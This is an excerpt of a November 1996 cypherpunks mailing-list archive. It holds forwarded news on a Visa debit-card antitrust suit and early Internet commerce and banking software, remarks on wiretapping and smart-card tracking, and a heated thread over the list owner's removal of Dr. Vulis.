>"wiretap" hooks in the carriers' systems.  When an MCI merges
>with a Britsh Telecom, who gets the benefit of the hooks?
>
>bd
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMmT3y680j2q8tTgtAQGC7wQA2ris5C3KAD6qLy3AmtglJRoZrei72CIH
>MEm7DGasD4AXqfwkjdmvZScAVXRD+KHHgVZQKQp+H0+D/TWHZCN9nrwE1z5/j73R
>o8qXDCC0owwJabZHknOMwpBm4Sf6JUGs7Wm1K9JmpVlF01GP+z7rxOMXfvZrlxvy
>mwcK3wjIPCU=
>=PTmz
>-----END PGP SIGNATURE-----
>
>
>
-----BEGIN PGP SIGNED MESSAGE-----

 -------------------------------------------------------
L. Patrick Elam, III                       404-639-4538
Systems Administrator                      404-608-3587[Pager]
Senior Systems Engineer                    Information System Services
Centers for Disease Control and Prevention http://www.cdc.gov
1600 Clifton Road, MS E-24                 lpe0@oddhiv1.em.cdc.gov
Atlanta, GA 30333, USA                     patelam3@atl.mindspring.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMkxKTclE1gRAhbnhAQFZ7AL/Y5cw/jNSgVJdqPdd0i8f5T9Xp7LMkFUG
iHuTftepC0UzghtI1JhCmBWehg+PfWx6wxt3gQZou/+KOLCGX8eWgnMstDX7KK2X
QK/V/rerRrIn8/so8K3GtLb/gj+pCUup
=F5EN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Mon, 4 Nov 1996 06:07:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961104.080708.9415.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


 American Banker: Thursday, October 31, 1996
 
Two Retail Giants Sue Visa Over Debit Cards 
 
By LISA FICKENSCHER
 
Two of the largest retailing companies have filed a lawsuit against Visa
U.S.A., claiming the bank card association illegally forces merchants to
accept debit cards. 
 
Wal-Mart Stores Inc. and The Limited Inc., in what they characterized as
a
class action on behalf of all retailers, accused Visa of coercing equal
treatment of Visa Check cards and credit cards. 
 
The suit, filed last Friday in U.S. District Court for the Eastern
District of
New York, alleged that the tying of debit and credit card acceptance
violates
antitrust laws. The retailers are seeking an unspecified amount in
damages. 
 
The action, a flareup of longstanding tensions between the bank card and
retailing industries, did not extend to MasterCard International, even
though
its policies are similar to Visa's. Industry sources speculated that
MasterCard
may have shielded itself through its recent cobranding agreement with
Wal-Mart, the nation's biggest retailer. 
 
But because Visa and MasterCard are owned by virtually the same banks,
the lawsuit has the same potential effect on the U.S. banking community
as if
MasterCard were named. 
 
The suit describes the approximately 2,800 banks that issue both Visa
credit
and Visa Check cards, and some 1,000 banks that are "acquiring members"
of both Visa and MasterCard, as co-conspirators. 
 
Retailers have long argued that credit cards and debit cards should be
priced

differently, and that they should have the freedom to decide what kinds
of
payments they accept. Under MasterCard and Visa rules, all their cards
must
be acceptable at any retail location that displays those logos,
regardless of
card type. 
 
Wal-Mart and The Limited, among others, have contended that debit cards
are more akin to cash and check transactions, which cost them less than
credit cards. Recent growth in the Visa Check program -- Visa said check
cards increased 49% in the second quarter -- led to Visa U.S.A.'s being
singled out in the lawsuit, said Wal-Mart spokeswoman Betsy Reithemeyer. 
 
The suit said Visa Check cards were used last year in approximately 556
million retail transactions, generating $22 billion in sales. 
 
The complaint estimated that merchants paid at least $250 million in fees
on
that activity. That total supposedly would have been less than $33
million if
processed through on-line systems such as regional automated teller
machine
networks. (Visa Check and MasterMoney payments are cleared "off-line,"
with some delay, like credit cards). 
 
If those purchases had been made with cash, checks, or travelers checks,
those same sales would have cost "well below" the $33 million estimated,
the
legal filing said. 
 
"Retailers are willing to pay fees," said Paul Martaus, an electronic
payments
consultant in Clearwater, Fla. "The issue since day one with debit is
that the
fee they pay varies with the transaction amount." 
 
The lawsuit claimed a Visa credit card transaction costs merchants 1.25%
of
the sale, or $1.25 on $100. The Visa Check fee on the same sale would be
1.04% plus six cents, or $1.10. On-line debit networks' fees go as low as
five cents. 
 
Visa officials, who saw the lawsuit for the first time Wednesday, said it
is  still cheaper for merchants to clear a Visa Check transaction than a
credit card
purchase. 
 
"The plaintiffs are wrong on the facts and the law," said Paul A. Allen,
Visa's
executive vice president and general counsel. "The rule that is being
attacked
has been a cornerstone of the Visa product and market for the past 25
years." 
 
"Visa will pursue this with all due vigor," said Mr. Martaus. "It
challenges
their livelihood." 
 
Visa has a long and successful record of turning back such legal attacks.
It
beat a 1984 price-fixing suit by Nabanco, a merchant processing company
now owned by First Data Corp. In the 1990s, Dean Witter, Discover & Co.
was unable to crack Visa's exclusive bank-membership policy. 
 
In 1983 Nordstrom Inc. of Seattle stopped accepting Visa's debit card to
protest the credit-debit tying requirement, which jeopardized its status
as a
Visa merchant. Nordstrom brought, but quickly dropped, a lawsuit against
the card association -- and later offered a cobranded Visa card. 
 
One legal observer, who did not want to be named, said the Wal-Mart and
Limited claims against Visa will be difficult to prove "because the case
does
not fit into the traditional antitrust box. Most antitrust cases fail." 
 
The lead attorney for the retailers is Lloyd Constantine of Constantine &
Partners, New York, a former antitrust chief in the New York State
attorney
general's office. 
 
 
 
American Banker: Thursday, October 31, 1996
 
Microsoft's Web Software for Merchants Wins Support 
 
By JENNIFER KINGSON BLOOM
 
Six major banks and payment processors announced support Wednesday
for Microsoft Corp. software designed to promote Internet commerce. 
 
Microsoft developed the software, Merchant Server 1.0, with Verifone Inc.
It conforms to the Secure Electronic Transactions protocol for credit
card
payments and is said to make it easy for merchants to set up shop on the
World Wide Web in as little as a month. 

 
The financial institutions and processors that have signed on are
BankAmerica Corp., Citicorp, Wells Fargo & Co., Royal Bank of Canada,
First USA Inc., and Dean Witter, Discover & Co.'s Novus unit. They plan
to
handle a variety of on-line payments functions for merchants. 
 
Microsoft chairman Bill Gates conceded that Merchant Server addresses "an
area that today is very, very small," but added, "We believe there will
be
explosive growth." 
 
Bankers said their business customers are hankering for sales outlets on
the
Web.
 
"You have to fight them off with a stick," said Adrian Horsefield, senior
manager of alternative delivery products at Royal Bank of Canada. The
bank, Canada's largest, plans to use the Microsoft software to open a
"virtual
mall" in March. 
 
Citicorp is planning a pilot program in Germany. Wells Fargo,
BankAmerica,
First USA's Paymentech unit, and Novus have agreed to recommend
Merchant Server to customers. 
 
For the banks, the software serves as "virtual bricks and mortar," said
Hatim
A. Tyabji, chairman and chief executive officer of Verifone. "A lot of
the talk
(about on-line commerce) is about to be translated into reality." 
 
Michael Dusche, Microsoft's banking industry manager, said "a huge
banking
opportunity" beckons. 
 
"There's so much apprehension whenever Microsoft does anything in the
banking community," he said. "We will let the banks remarket the product,
offering it directly to their merchants." 
 
With the banks in control of the payment system, Mr. Dusche said, a
participating institution could decide to offer incentives to merchants
and
consumers who used the bank's credit cards for on-line payments. 
 
Microsoft, of Redmond, Wash., and Verifone, of Redwood City., Calif.,
said
last summer they were collaborating on a system to ensure secure
electronic
payments, built on the bank card industry's SET standard. 
 
Verifone, the leading supplier of point of sale terminals, contributed
its VGate
and VPos systems, which securely whisk payment information between
Internet buyers and sellers. 
 
Other companies have come forward with similar offerings for merchants,
including Netscape Communications Corp., Oracle Corp., and Open Market
Inc. But several observers said the Microsoft-Verifone program appears to
be the most comprehensive and has the advantage of being backed by
companies merchants know and trust. 
 
"A whole host of people are delivering merchant server technology," said
Ray
McArdle, group executive for technology at First USA Paymentech in
Dallas, adding that the combination of Microsoft and Verifone "is
potent." 
 
"It's a more powerful product to the merchant community, and it's simple
and
inexpensive to use," he said. "Almost any merchant can afford to become
involved in this new channel." 
 
Scott Smith, an electronic commerce analyst at Jupiter Communications in
New York City, said that while other companies are providing
"components," Microsoft's software is "the most comprehensive so far."
 
"We see the merchant server as a breakthrough product," said Cathy
Medich, Verifone's marketing director. "It's really targeted to helping a
merchant run his store."
 
One drawback, Mr. Smith said, is that the software works only on
Microsoft's Windows NT operating system. "Like most of their offerings,
it
looks great, sounds great, but there are lots of hidden strings
attached," Mr.
Smith said. 
 
To date, most merchants have had to rely on a patchwork of software tools
and payment techniques to do business on-line. 
 
"It's been tough for businesses to set these sites up," Mr. Gates said.
"Many
companies have spent over a million dollars setting up an Internet
commerce
site, and many of those just aren't so compelling." 
 
Mr. Dusche said small merchants will be able to set up a virtual store
for as
little as $3,500. At more sophisticated on-line stores, shoppers will be
able
to see more than just a flat image of each product. 
 
"If you're looking at a handbag, you'll be able to turn it around, open
it up
and look inside," Mr. Dusche said. "It has to be a compelling experience
for
the user - they have to be able to see more than text." 
 
Among the first merchants using the product will be the bookstore of the
University of California at Los Angeles. The system will allow students
to
enter a course number and order books directly, without waiting in line.
The
Tower Records site will allow browsers to listen to snippets of music.
 
About 50 merchants have said they will use the technology to open such
stores by yearend. 
 
Jane Moy, vice president and general manager of electronic commerce at
Novus Services, called the Microsoft-Verifone merchant server "the first
step" toward ubiquitous Internet commerce.
 


 
InfoWorld: October 28, 1996
 
Lucent, Visa Strike Phone Banking Deal 
 
By Kristi Essick 
 
Lucent Technologies Inc. this month announced that Visa Interactive will
use
its phone-based voice-recognition banking software as an extension of the
Visa electronic banking and bill-paying network. Under terms of the
agreement, Lucent will provide its Intuity Conversant voice-response
system,
which recognizes and processes natural language requests via telephone,
to
Visa-member financial institutions in the United States. 
 
The technology, already being used by many banks in the United States for
their own networks, will now be connected to Visa Interactive's vast
electronic banking network to enable financial institutions to offer
bill-paying
services via voice-recognition phone calls, according to Ry Schwark, a
Lucent spokesman. 
 
Using the service, customers will be able to make electronic payments to
businesses and individuals, receive notification of low funds, and access
their
accounts after entering a personal passcode. A request such as "Can I
find
out my balance?" or "Write check to Aunt Ethel" will be recognized by the
Intuity Conversant system and electronically processed via the Visa
bill-paying network without users ever having to write a check, said Ken
Pilecek, bank offers manager for Lucent.
 
To be eligible for the service, users must submit to Visa in writing a
list of
individuals and institutions. Once the service is activated, users need
only 
call
the voice system and enter a password to authorize money transfers to and
from any account, Pilecek said. 
 
The first financial institution to sign up for the bill-payment service
is 
Kansas
City, Mo.-based UMB Financial Corp., which will make the services

available to its 130 member banks in the Midwest, Schwark said. The
Intuity
Conversant software complies with Visa Interactive's Access Device
Messaging Specification, an open protocol for bill-payment services. 
 
The starting price for the software is $6,700 for small and medium-size
banks
with an Intuity Conversant hardware system already installed. For banks
that
need both software and hardware, pricing starts at $18,000. Large bank
applications start at $30,000. The service is available now in the United
States, but it won't be offered internationally until next year. 
 
Users can expect to see services in Canada, the United Kingdom, and
Australia by midyear, but non-English speakers will need to wait until
Lucent
releases foreign language versions of the voice-recognition software,
which
may take as long as a year, Pilecek said. In addition to language
considerations, Lucent and Visa must also alter the service to comply
with
differing international banking regulations, Pilecek said. 
 
Lucent, based in Murray Hill, N.J., can be reached at (908) 582-8500 or
at
http://www.lucent.com.
 
 
Bank Automation News: October 30, 1996
 
Technology Provides Internet Connection 
 
Banks will be able to provide customers with better service and improve
productivity levels in their call centers as Internet technology software
improves, say consultants.
 
"A year ago, people said [the Internet] was a phase, now it doesn't
matter if
it is a fad, you need to be there," says Sheila McGee-Smith, director of
analysis and forecasting at the Pelorus Group in Raritan, N.J. 
 
Security First Network Bank [SFNB], of Atlanta, is implementing an
Internet
call center in three phases over the next several months to consolidate
customer inquiries received through various communication channels,
including the voice response unit and E-mail. 
 
The software will be implemented by Quintus, of Freemont, Calif., into
the
data center of Atlanta-based Five Paces Inc., a wholly owned subsidiary
of
SFNB. The center will use tracking software to identify the caller when
they
dial into the center from another line or E-mail the bank and transfer
the
inquiry to an agent. The system also will allow the initial servicing
agent to
track the request to place any follow up calls, says Lisa Green a
spokeswoman for Quintus. 
 
The service model was designed in conjunction with Palo Alto,
Calif.-based
Hewlett-Packard, which will supply the middleware, Cambridge Technology
Partners, of Cambridge, Mass., which will help with the integration
process,
and Little Rock, Ark.-based Alltel, which will manage the call center. 
 
Banks can establish Internet links to their call centers to give
customers
access to account information and have an agent return their call.
Internet
telephony systems let consumers speak with an agent while viewing the
banks
World Wide Web page over a single line, but require both the agent and
the
customer to have an Internet connection, sound card, Internet phone
software, a microphone and speakers, says McGee-Smith. 
 
Consider Customer Demographics First 
 
Before you implement Internet call centers or Internet telephony systems,
consider the regional and geographic differences of your customer base,
say
analysts. Customers at Citibank, of New York, for example, may be more
comfortable using Internet applications than those at a rural bank, says
McGee-Smith. 
 
Other equipment providers are incorporating these capabilities into their
systems. Lucent Technologies, of Basking Ridge, N.J., is planning to
offer
Internet telephony functions to its Intuity Messaging Solutions and
Rockwell
Switching Systems Division, of Downers, Grove, Ill., also produced an
Internet telephony system with Netspeak, of Boca Raton, a telephone
software company. San Jose, Calif.-based Aspect Telecommunications
Corp. also has Internet telephony functions. Santa Fe, Calif.-based Edify
and
AT&T , of Parsippney, N.J., also are working on an Internet application. 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Weiss <lazylion@idiom.com>
Date: Mon, 4 Nov 1996 09:21:28 -0800 (PST)
To: Will French <dlv@bwalk.dm.com
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611032354.SAA01354@interport.net>
Message-ID: <v03007800aea3c811e1c0@[206.14.165.67]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:54 PM -0700 11/3/96, Will French wrote:
>  Except it's not very effective, is it, since he's still
>posting flames?  In any case, it's an admission on John
>Gilmore's part that libertarianism can't work without some
>measure of authoritarianism; the only argument is over _just how
>much_ authoritarianism we need.

I disagree.

The difference between John's actions and 'authoritarianism' is John
runs this list himself for all of us.  We do not pay him taxes to do it,
we do not have financial interest in the computers he uses to do it and
in the final analysis, he is not beholden to us, nor we - him.

Ben Weiss                          Digital Arts & Sciences Corporation
mailto://Ben@iis.DAScorp.com       (formerly Digital Collections, Inc.)
mailto://lazylion@idiom.com        http://www.DAScorp.com/
WB5QAL/6 (Ham Radio)               (510) 814-7200 x.240 voice

    Apple Partner, Apple Media Partner & Acius 4th Dimension Partner

  What part of 'Congress shall make no law abridging the freedom of speech'
    did you not understand?

Disclaimer:My company doesn't tell me what to say and I don't always say
           stuff with which they agree, but we still get along just fine






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Nov 1996 06:26:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: URG_ent
Message-ID: <1.5.4.32.19961104142539.00693c7c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 11-02-96.

 "Transaction Records Urged for Smart Cards"

    Electronic money systems must generate transaction records 
    to help law enforcement agencies track money launderers, a 
    senior Justice Department official said last week. "In a 
    paper environment ... we can get bank records, we can get
    credit card records. Our goal is only to preserve this ability."


 "Internet insecurity "

    Jeff Schiller: The Web has a lot of potential vulnerabilities.
    There's plenty I know about that I don't want to talk about. 
    People who know about the vulnerabilities are reluctant to talk 
    about them because if we disclose what we know to the public, 
    the bad guys will take advantage. And if we address them with 
    the vendor community, they don't do anything about them. 
    There's a lot of hooey out there. Never trust the advice of 
    someone selling you a product, especially if the sales pitch 
    is, "My product makes your problem go away."


 "RSA offers kit for secure credit-card transactions"

    RSA Data Security, Inc. will announce today a tool kit for 
    developing secure applications that support credit-card 
    transactions on the Internet called S/Pay in support of
    SET.


 "Medcom introduces a "Super Cafe" data encryption product"

    Medcom's latest data encryption product, the Secure Socket 
    Relay (SSR), features strong encryption with full key length 
    (56-bits DES). A demo version can be downloaded at
    http://www.medcom.se/.


 "On Technology's Security White Paper" 

    "Taking The Threat Out Of Network Security," will stimulate 
    the industry into discussing some of the issues of security 
    that face the Internet industry and its users. Copies of 
    the paper are available on request from On Technology. The 
    company's Web site is at http://www.ontech.co.uk .

-----

 http://jya.com/urgent.txt  (21 kb)

 URG_ent

----------

In another story on gov-spooked insecurity:

 NEC announced that it successfully demonstrated country-to-
 country virtual private networking (VPN). During the tests, 
 privacy and security was maintained between the two sites by 
 deploying DES and triple-DES encryption. Since DES 
 encryption technology cannot be exported from the United 
 States, a Japanese version of DES, developed outside the 
 U.S., was used.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 4 Nov 1996 08:04:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Paper on Electronic Payment Systems (Swedish)
Message-ID: <v0300780daea3addf9529@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: gustavw@wineasy.se (Gustav Winberg)
Mime-Version: 1.0
Precedence: Bulk
Date: Mon, 4 Nov 1996 14:43:23 +0100
From: gustavw@wineasy.se (Gustav Winberg)
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Paper on Electronic Payment Systems (Swedish)

For all interested and Swedish-speaking (sorry...) list members:

I have just completed my graduation thesis in law at the University of
Stockholm. The title of the paper is "Elektroniska betalningssystem -
Teknisk säkerhet och juridisk osäkerhet" (eng. Electronic Payment Systems -
Technological Security and Legal Uncertainty"), and is available at

http://www.users.wineasy.se/gustavw

where you will find the ToC in HTML and the complete paper in pdf-format
(about 230K).
If there is sufficient interest, I might consider translating the paper, or
parts of it, into English. The legal bits are specifically about Swedish
Law, though, so I'm not sure how useful they would be for
non-Scandinavians.

Any comments or suggestions are greatly welcome and can be sent to
gustavw@wineasy.se.


BTW: Bob, thanks for a great list - I couldn't have done it without you...
Cheers!

BR,

Gustav WInberg

---------------------------------------
(ex.) Student of Law and Informatics
University of Stockholm,
Sweden
gustavw@wineasy.se
---------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 4 Nov 1996 08:04:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: ClipperFUD: tracking smart cards
Message-ID: <v03007810aea3ae2ba71e@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: oldbear@tiac.net
Date: Mon, 04 Nov 1996 00:20:34 -0500
To: Digital Commerce Society of Boston <dcsb@ai.mit.edu>
From: The Old Bear <oldbear@arctos.com>
Subject: tracking smart cards
Mime-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: The Old Bear <oldbear@arctos.com>

TRACKING SMART CASH

A senior Justice Department official has urged makers of smart
carts to include a mechanism for tracking transactions over a
certain dollar amount.

Assistant Attorney General Robert Litt also called for "sensible
limits" on how much value can be stored or transferred on a
single card or PC.  The government hopes it can work with industry
without stifling smart card development, and without compromising
individual rights.

"We don't want to dictate how these features are designed, but
there are certain reasonable parameters that industry should build
into their systems," says Litt.

source: BNA Daily Report for Executives
        29 Oct 96
        page A24


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 4 Nov 1996 07:03:26 -0800 (PST)
To: bdolan@USIT.NET (Brad Dolan)
Subject: Re: MCI/BT, who gets the taps?
In-Reply-To: <Pine.GSO.3.95.961104063825.28348A-100000@use.usit.net>
Message-ID: <199611041500.KAA10254@homeport.org>
MIME-Version: 1.0
Content-Type: text


Brad Dolan wrote:

| Long-distance telecommunications carriers have been in bed with
| governments since Samuel F. B. Morse strung a line into DC.  Only
| a modest amount of cynicism is required to think that there are
| "wiretap" hooks in the carriers' systems.  When an MCI merges
| with a Britsh Telecom, who gets the benefit of the hooks?

	Nothing changes.  The NSA & GCHQ liason officers will continue
to cooperate in bypassing the other countries laws for the mutual
benefit of the agencies.  BMCI will continue to tap and be tapped at
the whim of either government.

Adam
	
-- 
"Every year the Republicans campaign like Libertarians, and then go to
Washington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex F <alexf@iss.net>
Date: Mon, 4 Nov 1996 07:02:40 -0800 (PST)
To: Cypherpunks@toad.com
Subject: Re: [NOISE] Censorship of Dr. Vulius
Message-ID: <2.2.32.19961104150043.006bfbb0@iss.net>
MIME-Version: 1.0
Content-Type: text/plain


Someone on this list complained that there was one list that allowed
uncensored postings, and this was it.  Not that Dr. Vulis has been kicked
off that character of the list is either tarnished or alltogether gone.  The
same person likened this to a violation of Libertarian ideals, etc.  The way
I see it is this, being on this list is a priveledge, not a right.  When
someone abuses that priveledge they may lose it. Plain and simple.  It is
also worthy to note that the Right to Free Speech, etc. applies to the
government (IOW, the government can not hinder the right to free speech so
long as that speech does not infringe upon someone else's right.  Since when
is this list government run?  The decision was apparently a personal one.
Dr. Vulis was apparently asked nicely several times to stop flaming, and
post on relevant subject matter.  He did not.  Does the Libertarian ideal
also approve of uninhibited abuse of priveledges?  I don't think so.  To sum
up, I really don't see any conflict between John's actions and the
Libertarian way of thought, but that's just my personal opinion.

Later,

Alex F
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Alex F  -  Internet Security Systems
Webmaster/Security Training
alexf@iss.net
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 4 Nov 1996 07:58:11 -0800 (PST)
To: Will French <wfrench@interport.net>
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611032354.SAA01354@interport.net>
Message-ID: <Pine.SUN.3.91.961104104444.25737C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Nov 1996, Will French wrote:

>   Except it's not very effective, is it, since he's still
> posting flames?  In any case, it's an admission on John
> Gilmore's part that libertarianism can't work without some
> measure of authoritarianism; the only argument is over _just how
> much_ authoritarianism we need.
>   
>   I'm quite upset about this.  Up to now I was able to tell
> people that "there is at least one mailing list on the net that
> functions in a completely open manner".  No more.

One of the things you folks are missing is that this list is 
crypto-anarchy friendly.  Anarchy isn't chaos, it's self rule.  One of 
the things that us anarchists do is to deal with problems like Vulis.  
The usual methods are to flame back, to ignore, etc.

If the problem doesn't go away, then we'll make it go away.  Those who 
have the ability to make it go away will.  i.e. the folks that have 
control over the list server.  And that's the beauty of it.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 4 Nov 1996 07:59:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sliderules, Logs, and Prodigies
Message-ID: <199611041559.HAA22642@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> At 10:30 AM 11/1/96 -0800, Timothy C. May wrote:
> 
> >Sliderules were just becoming common when I was in high school....

When I was in high school, slide rules and log tables were standard
equipment - calculators started to come in towards the end. There
was a *lot* of controversy over their use in exams, and in homework
('show your working...'). At one point, you could use a calculator, but
only if you noted the fact (and model) on your exam paper.

I had a couple of nice 12-inch plastic slide rules - the better one, with
about 20 scales and double sides was stolen while I was in college.

I still treasure one of the heirlooms from my grandfather - a 12
inch bamboo rule, with his name carefully engraved in engineering
lettering ( which he used during his 50+ years at Ma Bell).

Not long ago I visited the MIT Museum, and in the shop found for
sale 'new' (circa 1975) plastic slide rules, both straight and circular.
I got one of each for old time's sake, and am thinking of having one
framed with a 'break glass in case of emergency' sign.

Peter Trei
trei@process.com

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 4 Nov 1996 08:00:34 -0800 (PST)
Subject: Re: Thank you, John Gilmore, for protecting freedom of speech , against Dr. Dmitri
In-Reply-To: <BL4TwD51w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961104110153.25737D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Dale Thorn <dthorn@gte.net> writes:
> > But there's probably a logical reason for taking this "action",
> 
> Such as someone being an effeminate long-haired limp-wristed bitch... :-)


And some of you guys are crying over his removal???  Sheesh!

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 4 Nov 1996 08:07:12 -0800 (PST)
To: Derek Bell <dbell@maths.tcd.ie>
Subject: Re: [NOISE]Re: Dr. Vulis; John was right!
In-Reply-To: <9611031446.aa18095@salmon.maths.tcd.ie>
Message-ID: <Pine.SUN.3.91.961104110543.25737E-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Nov 1996, Derek Bell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 	I'm not happy with the barring of Vulis from the list: sure he was
> a kook and he posted many ad-hominem messages*, but I feel a mini-FAQ would
> deal with the matter better. Explain the background to his tantrums** and
> explain how to filter out messages with various mail packages.


Right. I can see it now:

 "Hi, welcome to cypherpunks, it's a realy neat list where we talk about
crypto and other cool things.  Think of it as a living room or a bar - uh,
by the way, beware of that stain on the rug called Vulis, he will cause
lots of flame wars and spew our racist crap, but aside from that your stay
here will be a pleasant one.  You might want to filter him, here's how..."

Not cool.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 4 Nov 1996 12:30:43 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Censorship on cypherpunks [RANT]
In-Reply-To: <327E09AF.489E@gte.net>
Message-ID: <Pine.3.89.9611041122.A16513-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Nov 1996, Dale Thorn wrote:
[Quoting Adam]
> > This has been taken far too seriously.  Cypherpunks is a *PRIVATE* list.
> > There is no obligation to accept anyone.
> 
> Isn't this the same argument used by the state whenever they want to differentiate
> between your "rights" and your "privileges"?  Can they reject one of your privileges
> whenever they want to, at their discretion?  No.

Government != private. Why is this so difficult to understand?

> So if c-punks is really "private", how does it decide (arbitrarily?) who to include
> and who to reject?

"It" does not decide. "He" does. John Gilmore is the list *owner*. He can 
decide to remove anyboy from this list. Anytime. For any reason or no 
reason at all. He can even shut down the entire mailing list anytime he 
pleases, for any reason or no reason at all. 

There are no squatters rights in cyberspace.
-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Sun, 3 Nov 1996 16:34:40 -0800 (PST)
To: coderpunks@toad.com
Subject: ASIO encryption ?
Message-ID: <2.2.32.19961104002900.00926724@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear All,

Does anyone happen to know what encryption methods, algorithms, or
procedures ASIO (Australian Secret Intelligence Organisation) uses? Any
information regarding ASIO's methods, cryptographic or otherwise, would be
appreciated.

Yours Sincerely,

Benjamin Grosman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 4 Nov 1996 12:51:53 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <327E0677.6618@gte.net>
